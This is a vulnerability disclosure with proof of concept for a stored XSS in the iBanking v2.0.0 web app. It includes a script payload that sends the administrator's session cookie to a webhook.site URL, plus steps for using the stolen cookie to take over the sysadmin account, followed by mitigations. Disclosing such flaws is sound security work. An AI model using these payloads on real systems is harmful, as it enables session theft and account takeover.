CVE-2025-29412 - Cross-site scripting (XSS) vulnerability in iBanking v2.0.0

Description: Stored XSS leading to sysadmin session fixation

Version affected: iBanking V2.0.0

Version fixed: N/A

System: https://github.com/MartMbithi/iBanking

Researcher: Simon Njuguna

Proof of concept

Description: A cross-site scripting (XSS) vulnerability in the Client Profile Update section of Mart Developers iBanking v2.0.0 allows attackers to execute arbitrary web scripts or HTML via injecting a crafted payload into the Name parameter.

1.1 Steps to reproduce the vulnerability

Access the iBanking system

Login as sysadmin and create a new client 

Add the client details

Click add client to save the details

As the newly created client navigate to the Client portal and login as the new user:

Navigate to the Account section

On the name, phone number or address field, insert a javascript code that outputs the cookie for the current logged in user

<script>alert(‘document.cookie’)</script>. 

For demonstration purposes, we will use the address field

 Click update Account

The page will display John Doe’s cookie

Head over to the admin portal and login as sysadmin

Navigate to Clients, Manage clients

Once the sysadmin clicks the manage client link, the sysadmin cookie is displayed

Now that we are able to retrieve the cookie, we can use webhook to send the cookie to ourselves remotely. Head over to the john Doe account and edit the address field

<script>document.location='[webhook_url]/?'+document.cookie</script>

Sample script:

<script>document.location='https://webhook.site/3b6ac3f3-e93a-0913-q57i-17b8acbd3f2a/?'+document.cookie</script>

Click update.

To steal the admin cookie, the user will receive the cookie every time the administrator navigates to the manage clients section.

Headback to the sysadmin account and click clients> Manage clients

The session cookie will be received by webhook:

Session Fixation

With the admin cookie at hand, as the user, we can now fix our session and login as the sysadmin.

Visit the url: http://iBanking_IP/core/admin/pages_dashboard.php from the clients browser to access the admin dashboard.

Since our current client cookie is not valid for the sysadmin session, the browser will redirect you to http://iBanking_IP/admin/pages_index.php and prompt you to login.

Copy the sysadmin cookie received via webhook and open developer tools

On firefox:>

Developer tools>Storage>cookies and identify the client login cookie

Double Click the value section and paste the sysadmin cookie and press enter

On Chrome:>

Open Developer Tools, Application, Storage >cookies and replace the client cookie with the sysadmin cookie.

Burpsuite and ZAP Proxy:>

The same can be achieved by intercepting the request via Burpusite or ZAP Proxy and amending the cookie value

Now from the client browser, access the sysadmin dashboard: http://iBanking_IP/admin/pages_dashboard.php 

You have now successfully taken over the sysadmin account .

Some possible Vulnerability Mitigation measures

• Implement server-side input validation and sanitization
• Encode user inputs before displaying them to avoid executing malicious scripts.
• Set a Content Security Policy header in the web server to restrict the execution of inline scripts and limit sources for scripts.
• Set session cookies with HttpOnly and Secure flags
• Implement anti-CSRF tokens in forms to prevent unauthorized requests.